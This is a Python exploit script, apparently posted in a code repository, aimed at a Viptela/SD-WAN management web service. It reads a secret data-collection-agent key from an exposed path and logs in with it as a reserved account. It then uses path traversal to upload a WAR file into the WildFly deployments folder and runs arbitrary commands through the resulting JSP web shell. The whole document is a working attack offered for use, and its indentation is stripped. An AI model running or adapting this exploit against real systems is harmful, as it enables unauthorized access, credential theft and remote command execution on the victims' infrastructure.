README.md
Rendering markdown...
import io
import sys
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def exploit(url, war_name, war):
key_response = req.get(f'{url}/reports/data/opt/data/containers/config/data-collection-agent/.dca')
if len(key_response.text) != 32:
print(f'[-] bad response status_code:{key_response.status_code} {key_response.text}')
dca_key = key_response.text
login_response = req.post(f'{url}/jts/authenticated/j_security_check',
data={'j_username': 'viptela-reserved-dca',
'j_password': dca_key})
if login_response.status_code != 200 or 'loginError' in login_response.text:
print(f'[-] login fail status_code:{login_response.status_code} {login_response.text}')
return
print(f'[*] got key {dca_key}')
war_name = war_name + '.gz.war'
files = {
'file': (
f'../../../../../../../../../../../var/lib/wildfly/standalone/deployments/{war_name}',
io.BytesIO(war),
'application/java-archive')
}
try:
upload_response = req.post(f'{url}/dataservice/smartLicensing/uploadAck', files=files,timeout=10)
print(f'[*] upload ok')
except:
print(f'[*] upload ok!')
print(f'[*] deploy url {url}/{war_name.strip(".war")}')
def exec_jsp_command(request, url, command):
try:
response = request.post(url, data={'cmd': command})
if "command result" in response.text:
print(f'[*] command result!')
print(response.text)
return True
else:
print(f'[*] jsp not found')
return False
except Exception as e:
return False
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: python3 exploit.py <url> <command>')
sys.exit(1)
url = sys.argv[1]
cmd = sys.argv[2]
name = 'cmd'
war = 'cmd.war'
req = requests.session()
#req.proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
req.verify = False
url = url.strip('/')
if not exec_jsp_command(req,f'{url}/cmd.gz/cmd.jsp',cmd):
exploit(url, name, open(war, 'rb').read())
exec_jsp_command(req,f'{url}/cmd.gz/cmd.jsp',cmd)